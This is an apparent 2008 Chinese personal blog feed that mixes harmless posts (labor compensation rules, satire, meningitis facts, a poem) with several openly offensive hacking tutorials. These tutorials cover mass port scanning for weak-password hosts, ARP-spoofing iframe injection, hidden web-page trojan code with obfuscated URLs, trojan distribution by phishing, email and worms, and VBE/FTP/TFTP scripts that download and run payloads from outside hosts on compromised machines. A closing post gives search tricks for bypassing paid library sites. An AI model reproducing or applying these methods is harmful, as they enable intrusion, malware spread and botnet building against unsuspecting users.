古月一刀

测试

noreply@blogger.com (HuTao) — Fri, 29 Aug 2008 02:37:00 +0000

测试

经济补偿金医疗补助费失业保险金

noreply@blogger.com (HuTao) — Wed, 06 Aug 2008 10:13:00 +0000

终止或解除劳动合同尚未痊愈确需继续治疗的伤病职工，用人单位除按有关规定发给一次性经济补偿金(生活补助费)外，同时还应发给不低于六个月工资的医疗补助费，患重病和"绝症"的还应分别按不低于医疗补助费的百分之五十和百分之百的标准增发医疗补助费。

砖家论--转于QQ空间

noreply@blogger.com (HuTao) — Tue, 29 Jul 2008 00:53:00 +0000

一、不管别人提什么千奇百怪的问题，你都要回答："这很正常。"这样做的好处是，既说明了自己见多识广，又能说明别人少见多怪，从而确立自己的专家地位。例如：有人问"为什么汶川地0震.，我们国家的地0震.局，没有任何的预0测.？"你可以说："这很正常，地0震.预0测.是世界性难题。"有人问："为什么地0震.中学校的校舍倒塌的那么多。"你可以说："这很正常，地0震.的强度超过八级，所有的房屋都有倒塌的可能。"有人问："为什么中国足球，搞了这么多年改革，现在连伊拉克都踢不过？"你可以说："这很正常，因为足球比赛中有很多不确定因素。"有人问："你为什么老是说这很正常？"你可以说："这很正常，因为我是专家。"
　　二、要与正常人的见解有区别。专家之所以称为专家，就是要见人所未见，言人所未言。例如：有人说："物价涨的太厉害了。"你要说："不是物价涨，是中国的东西太便宜。"有人说："股市跌得太厉害了，政府应该救市"你要说："不行，要坚持中国股市的自由市场经济地位，避免政府对股市的干预。"有人说： "CPI增长了8.4%，活不了了。"你要说："这样的物价水平，大多数人都能接受。"有人问："你为什么我说东时，你总是说西？"你可以说："这很正常，因为我要是也说东，你会要我说吗？"
　　三、分析问题原因的时候，要分出一二三四。这一点很重要，就算是一个原因，你也要分出一二三四来，这样做，才能显示你对问题确实有研究，不愧对专家的称号。如果说一二三四的同时，你还遵循了先世界后中国的顺序，那么你就可以成为著名专家了。例如，你可以说："我分析汶川地0震.中校舍大量倒塌主要有三个原因：一从世界范围上来说，都存在地0震.中校舍倒塌的问题。例如美国……二是校舍倒塌，主要是因为地0震.的强度比较大。三校舍倒塌，也存在建筑不合格的可能。"你还可以说："我分析这次发改委提高油价有三个原因：一主要是受国际上油价上涨的影响。二人民群众对柴油的求量增加。三石油生产企业的供应量减少。" 有人问："你为什么总是用一二三四？"你可以说："这很正常，你看到任何人用四三二一吗？"
　　四、要说那些别人听不懂或者听完之后就迷糊的话，而且自己懂不懂没关系。例如有人问："中国平安为什么会推出如此庞大的融资计划？"你可以说："股市最重要的功能之一就是再融资，从经济学的角度讲#￥……。"有人问："你觉得中国楼价这么高正常吗？" 你可以说："我们必须一分为二的看问题，虽然从某个角度来说，不正常，但是从社会学上来讲……"有人问："为什么听完您的讲话，我有点困，还是不明白。"你可以说： "恭喜你，犯困是正常的，表示你开始听懂我说的东西内其中的奥妙了，不明白是正常的，否则我还能算是专家吗！"
　　五、有两个最重要的原则，是保证你成为专家之后能在国家媒体上保持上镜率的关键：一要有大局观念。例如，你可以说："虽然我们的法制法规还不太完善，但是目前我们国家在这一方面已经有了长足的发展……"你还可以说："虽然地0震.不可预0测.，但是我们国家对于地0震.的科研工作还是相当的重视……"你甚至可以说："虽然中国的专家都是事后诸葛亮，但是我们国家在这个问题上看到了许多打马后炮的优点……"二善于顾左右而言他。例如，你可以说："对于你提到中国看病难的问题，美国也存在这样的问题。我记得德克萨斯州……"你可以说："警察打人这样的事，只是警察队伍中个别人的个别问题，曰本也有这样的情况，我记得在东京……" 有人问："你为什么总是拿别国说事？"你可以说："这很正常，你听过外国月亮比较圆吗？"
　　六、最后这招，是大家都熟悉的绝招了，那就是：只要在正常的浮动范围内、与世界接轨和中国特色。因为这是绝招，大家又是耳熟能详，所以在此，不再赘述。只举些例子：你甚至可以说："一般而言，一个预0测.分析的可信度有三个看点：一从世界范围来看，专家的预0测.通常都有盲点，只要在正常的浮动范围内。二人民群众的智商明显提高，使得预0测.盲点有连成线的趋势，只要这个线的摆动在正常的浮动范围内。三有些个别专家，为了讨好人民需要，又将盲点由线扩大成面，别看这么大片面积，只要这个面在正常的浮动范围内，这些现象都算是正常的，这些预0测.都算是可信的。"碰到有人问："你的这些预0测.跟我吓懵的有什么不一样，为什么你的工资这么高？"你可答：" 与世界专家接轨。"那人再问："为什么别的国家专家的预0测.和你的不一样？"你可答："这是中国特色。"
　　综上所述，有此六技，则专家头衔可得矣！但是预防有人来踢馆时说："你这专家狗屁不通。"你要会说："起码我是吹牛皮，牛狗不同体，不通也是天然形成的，证明我是不可能放狗屁的。

流脑

noreply@blogger.com (HuTao) — Sat, 19 Jul 2008 01:12:00 +0000

医疗界有关人士介绍说，流脑是由脑膜炎双球菌引起的化脓性炎症，具有较强的传染性，每年冬春季，流脑的发病率可以占到急性细菌性传染病的第一位。流脑三大易感人群是儿童、老人和民工。

脑膜炎双球菌首先侵入呼吸道，患者会在发病的第一天出现类似上呼吸道感染的症状，如发热、鼻塞及轻微咳嗽等。到了第2—3天，致病细菌很快进入血液系统，破坏掉人体正常的血细胞，形成败血症，导致感染中毒性休克。患者表现为寒战高热、面色苍白、精神不振，身上出现淤斑或淤点。病菌还会通过血脑屏障，进入到脑组织中，导致脑膜炎，出现剧烈头痛、喷射性呕吐，甚至抽搐。

流脑引起的中枢神经系统感染，若得不到及时有效的治疗，患者可能因循环衰竭、呼吸衰竭而死亡，死亡率高达10％左右。

如果

noreply@blogger.com (HuTao) — Mon, 07 Jul 2008 10:52:00 +0000

如果失败的人生可以F5
      如果逝去的岁月可以CTRL+C
         如果甜蜜的往事可以CTRL+V
   如果莫名的悲伤可以DEL
           如果一切都可以CTRL+ALT+DEL
     那么我们所有的故事都不会ALT+F4
          如果没有OPEN那一刻的惊奇
   也不会有SHUT时的失落

抓鸡毛

noreply@blogger.com (HuTao) — Tue, 01 Jul 2008 09:11:00 +0000

新手如果做不好黒防鸽子的免杀的话，建议换个别的木马，如守望者，上兴，黑洞 and so on.相对而言免杀比较好做。免杀几乎是一切基础，所以一定要学好免杀，我们的甲壳虫论坛的免杀方面很不错，新手朋友要多多学习了，多思考，多动手，多提问，相信你免杀会有很大的进步的，(*^__^*) 嘻嘻……
  这里讲解下原理和方法，不具体操作演示，不方便还要控制下教程的大小，另外重要的是我认为新手朋友应该多自己动手实践下，看别人的教程演示跟着一般的做是不会有什么很大的进步，要学习思路和原理，自己动手实践，在不断的解决困难中进步。我走到今天的一点点感触，和新手分享下。
下面开始正题：
1：扫3389端口抓肉鸡

  这个方法比较简单，适合新手朋友。

原理：
   国内流传着一种克隆版的XP，安装后会默认开启一个账号为new,密码为空的账户，而且基本上都是默认开放3389服务的，我们就可以利用这一点来抓肉鸡。
方法：
   扫描工具（如S等等）扫一段IP的3389端口，扫完后就直接用3389连接器连接开放3389的机器，也可以把结果保存为文本，用批量生成3389连接的工具生成链接，比较方便的，然后输入账号new登入，如果别人的电脑前没人的话你就可以去你的空间下载你传好的木马然后安装。
   这种方法只能是XP系统，如果遇到2000或者2003系统就不要试了，除非有输入法漏洞，不过现在很少了，还有那么多的3389，干嘛在它上面浪费时间呢。汗- -！
   这个方法缺点也是大大的，XP只支持单用户登入，，你再登入上去就会把他挤出去，而且不可以抓国外的肉鸡。
建议：中午或者半夜行动，因为有很多的人会开着机子下载，杀毒啊，去睡觉。我们就有可乘之机了。(*^__^*) 嘻嘻……
2：扫135端口抓肉鸡

步骤：A:
   a-先用扫描器扫一段IP的135端口

   b-整理一下

   c-NTSCAN过滤有弱口令的机器

   d-最后用recton开telnet传马

   B:
   有一些自动抓鸡工具，功能类似，如Bluisland,Wmi,蜜蜂，知音等等，比较傻瓜化的。
这里简单说两点：Bluisland 木马改名为 boot.exe , IP保存为ip.txt,放在同一个目录下。
            Wmi 需要修改，具体看操作。

问题：因为国内的一些网络运营商屏蔽了一部分的端口，你可能扫不到135，或者扫到的135没有检测到空口令？！怎么办？！
解决：1：你要开了这3个服务就可以开通

   我的电脑--管理---服务
   TCP/IP NetBIOS Helper
   Remote Procedure Call (RPC) Locator
   NT LM Security Support Provider
2：xp打线程补丁一般线程为1000-3000之间就可以了如果还扫不到就打4000
打好补丁之后重启。
3：抓鸡前关掉杀软和防火墙（包括系统自带的防火墙）
4：木马一定要免杀扫的IP范围不要太大 XP系统扫的不是很快有条件的见意装个2000或者2003系统，可以用syn方式扫
5：换个ip段扫。可以扫下本地的ip段。
6：终极解决方案，拿个服务器扫，这是最好的方法。
或者在鸽子或者别的肉鸡上扫，上传S扫描器
首先要关防火墙 CMD命令 net stop alg /y 或者net stop sharedaccess
S扫描器命令： s.exe syn《xp的机子为tcp》开始IP，结束IP 端口线程/save
            s.exe syn 125.108.0.0 125.108.155.255 1433 700 /save

  3: 扫445端口抓肉鸡
   扫135抓肉鸡差不多，先用扫描器扫一段IP的445端口，然后把结果整理，再用NTSCAN过滤有弱口令的机器，最后开共享传马，可以用啊D工具包。
屏蔽的话可以扫本地的445试下。

  4：1433端口批量溢出抓肉鸡

  原理：可以利用漏洞溢出实现全自动抓鸡，不过现在太多人搞，成功率不是很高。

  工具：S.exe sqlhello.exe nc.exe 批处理文件

  方法:先打开多个NC监听,然后再打开扫描溢出的.bat,然后你就可以去睡觉去了。自动扫描，扫描完后       自动溢出，溢出后自动下马执行。
   这就是批处理的威力，希望大家有时间多专研下，我在论坛发布的有详细的批处理教程文章。

另外有42 21等端口的溢出，原理都是类似的，大家自己尝试下吧。

5: 扫1433弱口令抓肉鸡
工具：端口扫描器 X-scan 和 SQL综合利用工具

原理：开1433端口的机器一般都装有SQL，所以我们可以猜测SQL弱口令来抓1433肉鸡。
方法：
   先用端口扫描器扫一段IP的1433端口，然后结果保存为文本文件，

   接着用X-scan导入这些开了1433的IP，然后在扫描参数-全局设置-扫描模块这一栏里只勾上SQL-SERVER就可以了，其他不要勾。然后在插件设置-端口相关设置-待检测端口这一栏，只填1433端口。然后就可以开始扫描了，扫描完成后会有个报告，列出了有弱口令的机器，

   然后打开SQL综合利用工具，输入你扫到的弱口令来连接，接着打开SQL综合利用工具-利用目录，上传你的木马，然后在用DOS命令执行你的木马。

另解：WINNTAutoAttack 原理一样。
  6：扫4899空口令抓肉鸡

工具：扫描器 4899探测器 Radmin

原理： Radmin开放的端口默认为4899.

方法：先用端口扫描器扫一段IP的4899端口

      用4899探测器导入开了4899端口的IP，过滤下

      Radmin连接有空口令的机器，带开文件管理，上传运行你木马
  7: 扫5900端口抓VNC肉鸡
工具：VNC扫描器 VNC连接器
原理：VNC开放5900端口

方法：先用VNC扫描器扫描一段IP的5900端口，
      扫描格式为vscan.exe（扫描器文件名） -i 219.0.0.0-219.255.255.255（扫描IP段） -p 5900 -vnc -vv  建议扫国外的ip段，国外用这个的比较多，一般机子也不错的。
      扫描完成后会在扫描器所在的同一文件夹生成一个文本文件，打开后有一列IP，IP后面的有一些单词比如patched,banned,vulnerable,只有为vulnerable才能连接。接着就用VNC连接器连接。

  8： ARP局域网欺骗挂马

   ARP命令： zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -insert "<iframe src='xx' width=0 height=0>"
这里网马地址就假设为  http://www.darkst.com/  那么命令就是
zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -insert "<iframe src='http://www.darkst.com/' width=0 height=0>"
接上 3389 服务器服务器必须安装 winPcap.exe 工具都有打包
然后就执行  zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -insert "<iframe src='http://www.darkst.com/' width=0 height=0>" IP自己改

zxarps.exe是免杀的  先安装WinPcap_4_0.exe 然后运行1.bat的批处理输入命令zxarps.exe就可以了
这样就可以把马挂上拉如果拿到一台内网机器整个机房的机器都可以挂上马

   这个方法我还没尝试过，大家可以实验下。听说效果不错的。
9 ：另外一些思路

快乐行 vLan 等。
  教程结束，大家有什么不懂的可以去论坛发帖或者去群里问。有什么好的方法建议也可以和我说下。
  工具就不打包了，太大了。汗！论坛上或者别的黑客工具下载网站都，大家自己找下，实在没有的找我要，群ID：后门。(*^__^*) 嘻嘻……

怎样挂马

noreply@blogger.com (HuTao) — Sat, 28 Jun 2008 08:58:00 +0000

1.框架挂马：
<iframe src=网马地址 width=0 height=0></iframe>

  2.js文件挂马：

   首先将以下代码
   document.write("<iframe width='0' height='0' src='网马地址'></iframe>");
   保存为xxx.js，
   则JS挂马代码为
   <script language=javascript src=xxx.js></script>

3.body挂马：
<body onload="window.location='网马地址';"></body>

4.隐蔽挂马：
top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src="网马地址/"></iframe>';

5.css中挂马：

   body {
   background-image: url('javascript:document.write("<script
   src=http://www.XXX.net/muma.js></script>")')}

6.JAVA挂马：

   <SCRIPT language=javascript>
   window.open ("网马地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro
   llbars=no,width=1,height=1");
   </script>

  7.图片伪装：

   <html>
   <iframe src="网马地址" height=0 width=0></iframe>
   <img src="图片地址"></center>
   </html>

8.伪装调用：

   <frameset rows="444,0" cols="*">
   <frame src="打开网页" framborder="no" scrolling="auto" noresize    marginwidth="0"margingheight="0">
   <frame src="网马地址" frameborder="no" scrolling="no"   noresize    marginwidth="0"margingheight="0">
   </frameset>
这里我给大家说到了8种常用的方法，我详细说下第1种方法：

<iframe src=网马地址 width=0 height=0></iframe>，熟悉HTML语言的朋友都应该知道这是一个框架结构，

它的标准格式是：<iframe src=URL name=iframename>…</iframe>，就是说在网页中调用了另外一个网页框架，我们看上面的代

码，"src=网马地址"：要调用打开的网页，也就是我们的网页木马，"width=0 height=0"宽和高都为0，也就是说我们把这一

句话插入到一个正常的网页后，我们在打开这个正常网页的同时，打开了我们的木马网页，木马网页的宽和高为0，表示不会显示

出来，其实已经在后台打开了，那么我们的木马也就运行了。

我们来改变宽和高的大小看一下效果，看我操作。。。。。。。。。。

有时网站管理员会看主页的代码，看到这样一句也就是说他的网站被挂马了，也就会看到你的网页木马的地址，我们不妨给地址加

密一下，用到的是牛族字符转换器，转换后我们就可以将这样的代码插入到正常网页中，这里的位置是随意的。

<iframe src=http://%77%77%77%2E%68%6F%6E%6B%65%72%62%61%73%65%2E%6E%65%74%2F1%2E%68%74%6D width=0 height=0
></iframe>

还有另外的七种方法，我们依情况而定，譬如说我们入侵的一个网站里面有很多的JS文件，那么我们使用JS挂马就比较隐蔽了，还

有就是有些网站是一个图片网站，或者说网站模板很好看，那么它的CSS样式一定很多，所以说不同的情况我们运用不同的方法，

时间关系我这里就只说这么多了，大家下去自己每个方法都实践一次，这样才会有进步。

课程发散：
   1.最新的网马生成器的使用

   2.htm网马免杀方法（如：拆分特征码，Escape加密等）

   3.不通过生成器，在得到漏洞信息后，自己写网页木马。

   4.同样的方法挂不同的木马（如：QQ木马）

随课程附有：《挂马方式和系统判断等代码》代码，自己多研究下。

养鸡专业户2

noreply@blogger.com (HuTao) — Thu, 26 Jun 2008 09:42:00 +0000

内容相当丰富.相信看完本教程你一定会成为养鸡专业户.

一.目前流行木马传播技术.

1.用BT制作木马种子

利用BT制作木马种子的教程网上也发布了很多,这里主要找一款具有诱惑性的软件

然后捆绑上自己的木马,做成种子,最后发布出去.相信利用BT抓鸡速度可是超快哦.

2.利用PP共享自己捆了木马的软件或电影.

方法同BT一样,要找诱惑性电影或软件,捆上自己的木马,然后共享自己的目录,这样人

家就会通过搜索找到你的软件或电影.这里电影要配合网页木马.可以参看RealOnePla

ye木马制作.在黑鹰可以找到.当你一打开我们的电影时就会打开我们制作过的网页木

马.这样看电影也会中我们的马.

3.利用QQ邮箱传播木马.

这里主要点HTML格式----在里面写上以下这段代码:

<body > </body>

当人家一打开你发过去的邮件时,就会中我们的木马.

4.QQ群发网页木马。
　
首先，你要申请多个QQ号，然后找款QQ消息群发器（黑鹰网站可以找到大量相关QQ群

发信息软件，）再然后要加上非常具有诱惑性的消息（肉鸡的多与少与这个直接相关

，），骗取人家点你的网址。最后，在晚上时可以挂在电脑上群发带有网页木马的信

息。相信只要你的信息够诱惑，肉鸡也是成群的。

5.利用163邮箱传播网页木马。

同样，这里用HTML格式，然后填上以下代码：

</html><iframe src="你的网页木马地址" name="zhu" width="0" height="0"

frameborder="0">

对方只要一打开，就会中我们的网页木马。

这里发送邮件时注意一些技巧，我们要加入一些社会工程会。比如对方是爱好车的，

你就在邮件标题上写上关于车的诱惑性标题。目的只有一个，让他点我们带有网页木

马的邮件。

6.利用邮箱群发我们的网页木马。

这里要用到论坛邮箱提取器，这类工具黑鹰也有下载，大家可以找一下。提取大量

邮箱后，配合FOXMAIL这款软件进行群发传播带有网页木马的邮件。这里也要注意技

巧，比如在一个游戏论坛提取的邮箱，你就可以伪装本论坛发给广大游戏玩家,提供

最新游戏外挂下载.然后写上自己的网页木马.大部分都认为信息的真实性而点击.从

而中我们的木马. 这里还可以配合利用HTML格式群发我们的网页木马效果可更佳!

7.捆绑欺骗

这也是比较常用的传播木马技术.把木马捆在游戏,流行软件上,配合以上方法,QQ,邮

箱,BT,论坛,等发布捆了木马的软件.骗取点我们的软件,这样也就同时中了我们的木

马.关于捆绑技术,本人做了三个非常具体详细的语音动画教程.不懂的可以在黑鹰查

找本人的捆绑系列专辑教程.

8.攻破下载点,捆上木马放入下载点.

当我们入侵到一些网站时,看看是否开放21服务,也就是是否提供FTP服务.若入侵到

这类网站,恭喜你,你又可以得到大批量肉鸡.你可以捆上自己的木马然后放入下载点

等待人家上钩吧!该方法抓鸡的速度也非常快.

9.钓鱼式欺骗别人点击你的网页木马地址或木马.

钓鱼式欺骗攻击,也是国内最新发现的一种攻击手法.主要利用社会工程会中的信任

关系骗他点击.具体的利用方法:当盗了人家的QQ号,你可以看看有几个群,然后在群里

放上自己捆绑的木马.接着在群里发几条诱惑性的信息,比如最新申请6位QQ号软件,

由于是在同一个群,可能他们对该QQ号主人有一定的信任度,所以点击的可能性一定

很大.若该QQ号主人是群主或是管理员,哈哈,我们来个更毒的,干脆在公告上写上自己

的网页木马地址,然后说本群刚建的专用网站!由于是群主,他们对他的信任度可想而

知.应该都会点的吧!还有一招,在他QQ的个人资料上或个人签名上填上自己的网页木

马,然后说刚建的个人网站.相信很多好友都会自动点击吧!

10.网站主页挂马

这个应该不用具体介绍吧,教程有N多.入侵到一个网站得到WEBSHELL后,接下来大家

是不是都忙着找首页挂马了.

11.论坛漏洞挂马

这里主要利用论坛的一些漏洞进行挂马,比如最近的动网前台提升管理员,然后挂马,

动网的个人资料过虑不严挂马,还有投票挂马等等.利用这些漏洞进行挂马.也有相关

教程,不是很清楚的可以在黑鹰找到.

12.文件类型伪装

这里主要把一些木马服务端和一些文本文件捆绑在一起,然后通后自解压方式或捆绑

器制作成文本文件类型的可执行文件.但他以为打开一个文本文件时,虽然能正常运行

文本文件,其实已经中了我们的木马.真是神不知鬼不觉!本人也做过文件类型欺骗的

动画教程.不是很清楚的也可以在黑鹰或动画吧找到本人的相关的教程.当然,还要以

伪装成其它的类型,比如把木马制作成BMP图片.BAT格式等.只要他一运行就会中

我们的马.

14.其它的传播技术:比如制作图片木马,也有专门的图片木马制作工具,RM木马制作

黑鹰也有相关教程,RealOnePlayer木马制作,FLASH木马制作.也有专门的制作工具,

网上可以找到相关工具.这些也是比较常用的传播技术.只要你有这方面的思路,都可

以在网上找到相关资料,自己尝试制作.

   二.新型高级木马传播技术

下面介绍几种比较高级的木马传播技术.由于有一定的技术难度,所以隐蔽性比较强,

传播速度也快,而且也几乎不会被杀毒软件查杀.

1.在WORD文档中加入木马文件

这种方法非常隐蔽,在WORD文档尾加入木马文件,只要别人点击这个所谓的WORD文件就

会中木马,这种方法主要是通过把一个EXE格式的木马文件接在一个DOC文件的末尾,使

别人察觉不到木马的存在,因此使之上当受骗.具体实现方法,比较复杂.本人也在进一

步的研究之中.相信在不久这种方法就会流行起来.现在主要被一些高手使用.

2.黑客工具绑木马

其实这本来算不上高级的方法,但最近发现很多黑客软件发布站,捆了木马的工具躲过

管理员的检测.照样发布出来,想像危害性有多大.其实他们就是利用人性的弱点.黑客

工具本来被杀毒软件查杀,捆了木马的工具被查杀就不觉得奇怪了.就会放松警惕.从

而被他们利用.这一招是他们把黑客中的社会工程学利用的"恰到好处"!

3.用Z-file伪装加密木马程序

z-file伪装加密软件是台湾华顺科技产品,其经过将文件压缩加密之后,再以bmp图像

文件格式显示出来,扩展名是bmp,执行后是幅普通的图像.黑客会将木马程序和小游戏

合拼,再用z-file加密及将此"混合体"发给受害者,由于看上去是图像文件,受害者往

往不以为然,打开后又只是一般的图片,最可怕的地方还在于就连杀毒软件也检测不出

它内藏木马.

4.伪装成应用程序扩展组件

此类属于最难识别的特洛伊木马,也是骗术最高的木马,当然技术实现也有相当的难度

由于涉及到编程,所以我这里只简单介绍原理,以供参考.

采用内核插入式的嵌入方式,利用远程插入线程技术,嵌入DLL线程,或者挂接PSAPI,实

现木马程序的隐藏.

5.通过QQ病毒,QQ蠕虫,QQ尾巴或邮箱病毒,蠕虫进行传播.

相信利用这些技术进行传播木马的速度是最快的.这里要下载病毒,蠕虫源代码.进行

分析.修改.加入我们的网页木马地址.然后传播到网上,这样就会一传十,十传百,指数

级上升,自动为我们传播木马.这种传播速度是惊人的.网上也可找到相关QQ蠕虫制作

器,菜鸟朋友就可以直接制作自己的带有网页木马的蠕虫了.最近的唐山黑客就是利用

QQ尾巴传播自己的木马,感染并操控了四万多台民用电脑.进行对北京的一家音乐网站

进行分布式DDOS攻击.利用该技术是相当高级的,速度也是最快的.

                           上传木马的8种方法!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

TFTP法传输
我们最喜欢也是最方便的方式是用TFTP！这里要配合TFTP32这个小型的文件传输服务器，TFTP 协议使用的是UDP69端口，在我们得到肉机的SHELL后可以很方便的传输文件到肉机上的！下面看我详细的讲解和操作，在我们得到的SHELL里输入 tftp –I IP get/put xx.exe就OK了，注意这里一定要记得带上参数-I,不然是不会成功的，还有要注意的是PUT是把肉鸡上的文件传到我们自己的机子上，一般常用来偷秘密文件（怎么像做贼似的）；GET是从我们的机子上取文件到肉鸡上，也就是上传文件到肉鸡上，我们这里要用的是GET这个动作，因为我的IP是 222.XXX.XXX.2，所以我就在得到的SHELL里输入tftp –I 222.XXX.XXX.2 get nc.exe就是到我们的机子上取NC这个我们要上传的文件，可以是任何你想传的东西，但是最好传的文件比较小，否则容易失败.
别急着敲回车，我们还要在我们自己的机子上架好TFTP32这个软件才行，这里有个技巧，我们可以把TFTP32这个软件和我们的NC放在一个目录下，这样在取文件时就不用另外写路径了，很是方便，我们把TFTP32放在NC一个目录里打开后它就在69端口监听看有没有需要传送文件的请求，这时我们就在得到的SHELL里写好的那句话后敲回车就就等待上传成功吧~~~~~~
★二★、 Recton程序种植者直接种植
Recton程序种植者又种方法可以用，一个是依赖IPC的，一个则是通过写VBE来用HTTP法下载的，分别叙述如下：
1、IPC上传
IPC上传方式只依赖远程主机开放IPC$和目录共享,不依赖 Task Scheduler服务。具体情况参考下图，远程主机写上对方的IP地址；用户名就是你具备管理员权限的帐号；密码就是你那个帐号的密码；选则IPC上传，在本地选好要上传的文件，最后写上启动参数就OK了！
2、Http法上传
Http下载不需要远程主机开任何共享,也不依赖Task Scheduler服务。其原理是在远程主机上写入、执行一个能从 web上下载文件的VBS脚本。需要注意的是文件地址和启动参数一定要写正确,否则无法执行!文件地址一定要包含http://，如下偶写好的一个例子，运行后就会下载http://************/muma.exe并且运行。
★三★、EXE2BAT的超级应用
本例是使用一个名为exe2bat的小工具，在本地打开一个CMD，切换到exe2bat所在目录，输入：exe2bat.exe后回车，exe2bat 可以将一个应用程序（.exe）转换为一个批处理文件(.bat)，而批处理文件我们是可以编辑的，下面我们就将一个开3389的小工具3389.exe 转换为批处理文件。输入：exe2bat.exe 3389.exe 3389.bat，回车后就可以得到一个名为3389.bat批处理文件。
好了，我们用记事本打开生成的批处理文件，然后点击"编辑"菜单中的"全选"和"复制"命令，将文件中的源代码除了最后2行外全部复制到剪贴板中。
再切换到我们得到的SHELL窗口里，点击右键选择"粘贴"命令把我们刚才复制的字符都粘贴进去，你会看到代码飞速变换，像黑客帝国里的镜头，很过瘾!
代码复制完成后，输入：ren tvisGRAY 3389.exe命令就可以把3389.exe还原，现在你的这个文件就传上去了。这种方法的优点是不言而喻，因为它可以直接利用已经得到的shell将文件以"代码"的形式输入到对方电脑，不需要任何网络工具的支持，同样也不必打开任何的端口，也没有任何进程，能穿越任何防火墙。不过这种方法也有一个明显的缺点，就是上传的程序体积不能太大，不然代码的上传时间太久不说，再还原成源程序的时候也可能出现问题。
★四★、FTP法传输
有的时候我们自己的计算机没有公网IP地址，这个时候想用TFTO就比较麻烦了，如果你嫌上面的办法比较麻烦的话，那你还可以用这个比较简单的办法就是用 FTP，但是我们在得到的SHELL里不能直接登陆我们的FTP服务器去下载东西，这涉及到一些FTP协议的问题，在这里就不详述了，我们只是讨论怎么传文件嘛！当我们不能直接传的时候我们可以换个办法来实现，这个办法就是写个ftp.txt的文件来向FTP服务器提交就可以了。在我们得到的肉鸡的 SHELL里写入以下代码：
echo ftp >ftp.txt
echo open服务器ip [端口]>>ftp.txt
echo username>>ftp.txt
echo password>>ftp.txt
echo get sample.exe>>ftp.txt
echo bye>>ftp.txt
其中服务器ip就是你放你想传的文件的FTP的服务器 IP地址；username就是你登陆你的FTP的帐号；password就是你的密码；sample.exe就是你想下载的程序名字。最后一个bye是退出FTP服务器。
其中218.XXX.XX.163 就是我的FTP服务器的IP地址，iceskysl就是我的用户名，653917就是我的密码；mt.exe就是我想下载的文件。我们DIR下看看写成功这个ftp.txt么？
为了确保我们没有写错，最好还是用TYPE命令来看看这个 FTP.TXT文件的内容是不是我们想写进去的，一般来说是不会错的！接着执行ftp -s:ftp.txt 就可以下载到们的那个文件了，我这里下载的就是MT.exe这个文件，显示的就是我成功下载的提示了。
记得最后要用del ftp.txt来删掉我们写的这个TXT文件，要不被发现了我们就亏大了！现在这个文件就传上去了，接着怎么做就不要我教你了吧！
★五★、利用xiazai.vbe法
这个方法也是很简单有效的，我们在得到的肉鸡SHELL里依次写入下面这些命令来创建一个VBE文件，代码如下：
echo with w:if .arguments.count^<2 then .quit:end if >xiazai.vbe
echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >>xiazai.vbe
echo web.open "get",.arguments,0:web.send:if web.status^>200 then quit >>xiazai.vbe
echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >>xiazai.vbe
这样就会在肉鸡中生成一个xiazai.vbe的文件，如下图是我演示的一个结果显示，我们通过DIR可以看到这个xiazai.vbe文件已经成功创建了。
现在我们只要输入c xianzai.vbe http://iceskysl.e2u.cc/server.exe  mtt.exe就可以把http://iceskysl.e2u.cc/server.exe这个地址下的这个server.exe下载到肉鸡中并且改名字为mtt.exe，目的达到，接着怎么做，我就不多说了！
★六★、利用iget.vbe法
这个方法同上面的那个差不多，只是写法不一样，具体的还是在肉鸡SHELL中写入下面的代码：
echo iLocal = LCase(W.Arguments(1)) >iget.vbe
echo iRemote = LCase(W.Arguments) >>iget.vbe
echo Set xPost = CreateObject("Microsoft.XMLHTTP") >>iget.vbe
echo xPost.Open "GET",iRemote,0 >>iget.vbe
echo xPost.Send() >>iget.vbe
echo Set sGet = CreateObject("ADODB.Stream") >>iget.vbe
echo sGet.Mode = 3 >>iget.vbe
echo sGet.Type = 1 >>iget.vbe
echo sGet.Open() >>iget.vbe
echo sGet.Write(xPost.responseBody) >>iget.vbe
echo sGet.SaveToFile iLocal,2 >>iget.vbe
这样写好后就可以这样执行了c iget.vbe http://icesky.com/muma.exe mm.exe 就可以把http://icesky.com/muma.exe这个地址的程序muma.exe下载下来并且改名字为mm.exe。
★七★、利用Http网站vbe法
这个就是我们前面讲的那个Recton程序种植者所用的HTTP法下载的原理，我们在得到的肉鸡的SHELL里依次写入下面这些：
echo Set xPost = CreateObject("Microsoft.XMLHTTP") >dsa.vbe
echo xPost.Open "GET","http://d.thec.cn/mygoit/readme.exe";,0 >>dsa.vbe
echo xPost.Send() >>dsa.vbe
echo Set sGet = CreateObject("ADODB.Stream") >>dsa.vbe
echo sGet.Mode = 3 >>dsa.vbe
echo sGet.Type = 1 >>dsa.vbe
echo sGet.Open() >>dsa.vbe
echo sGet.Write(xPost.responseBody) >>dsa.vbe
echo sGet.SaveToFile "readme.exe",2 >>dsa.vbe
写好后执行：c dsa.vbe 就可以把你上面的那个地址（"http://***.*/sample.exe，注意要换成你自己放程序的地址）下的文件下载下来了，最后同样别忘记了用del dsa.vbe删掉我们刚才写的那个文件哦！
★八★、 3389法
如果你得到的主机是可以开3389的，那就更加好办了，我们有很多的办法开3389，（这个到底怎么开就不在这个专题之内了，你可以查阅相关资料或者写次再写这个专题的内容）你就可以开了他的3389，再自己加个帐号，然后登陆，在它的3389桌面环境下进行"本地"下载，该方法还有个好处就是对服务器上传很严格的机器特有效。（包括硬件防火墙）

让收费网站去死吧，用google 突破

noreply@blogger.com (HuTao) — Thu, 26 Jun 2008 06:32:00 +0000

从一个论坛里看到这个帖子，感觉比较不错，利用了google强大的搜索功能——
让收费网站去死吧，用google 突破

首先打开Google，在关键词输入框中输入"index of/"inurl:lib(双引号为英文状态下），选择"搜索简体中文网页"选项，回车搜索，得到了一些网页，不要以为这是一些普通的页面，其实它们是一些图书网站的资源列表，点击打开它来看看，怎么样？是不是所有资源一收眼底了？
使用其他关键字可能得到更多的资源
在搜索框上输入："index of /"cnki
再按搜索你就可以找到许多图书馆的CNKI、VIP、超星等入口！
在搜索框上输入："index of /" ppt
再按搜索你就可以突破网站入口下载powerpint作品
在搜索框上输入："index of /"mp3
再按搜索你就可以突破网站入口下载mp3、rm等影视作品
在搜索框上输入："index of /"swf
